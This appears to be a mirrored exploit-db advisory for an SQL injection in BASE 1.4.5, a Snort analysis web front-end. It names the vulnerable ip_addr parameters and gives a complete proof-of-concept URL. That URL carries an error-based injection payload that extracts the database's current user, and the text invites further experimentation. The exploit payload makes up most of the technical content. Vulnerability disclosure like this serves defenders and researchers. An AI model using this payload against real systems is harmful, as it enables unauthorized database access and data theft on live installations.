BASE 1.4.5 – ‘base_qry_main.php?t_view’ SQL Injection

  • 作者: a.kadir altan
    日期: 2012-02-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18465/
  • # Exploit Title: BASE 1.4.5 SQL Injection Vulnerability
    # Date: 30/01/2012
    # Author: a.kadir altan (testpenter_AT_gmail.com)
    # Software Link: http://base.secureideas.net
    # Version: 1.4.5
    # Platform: PHP
    ##########################
    BASE Snort Analysis Front-end SQLi Vulnerability
    
    Vulnerable parameters: 
    ip_addr[0][1]
    ip_addr[0][2]
    ip_addr[0][9]
    
    Vulnerable URL: 
    http://server/base_qry_main.php?new=2&num_result_rows=-1&submit=Query%20DB¤t_view=-1&ip_addr_cnt=1&ip_addr[0][0]=%20&ip_addr[0][1]=ip_dst&ip_addr[0][2]==&ip_addr[0][3]=11.11.11.11&ip_addr[0][8]=%20&ip_addr[0][9]=%20<SQLi HERE>
    
    PoC:
    http://server/base_qry_main.php?new=2&num_result_rows=-1&submit=Query%20DB¤t_view=-1&ip_addr_cnt=1&ip_addr[0][0]=%20&ip_addr[0][1]=ip_dst&ip_addr[0][2]==&ip_addr[0][3]=11.11.11.11&ip_addr[0][8]=%20&ip_addr[0][9]=%20)%20AND%20(SELECT%208543%20FROM(SELECT%20COUNT(*),CONCAT(0x3a796d723a,(MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,50)),0x3a6479783a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20(5635=5635
    
    Play with ip_addr[x][y], including removal.
    ##########################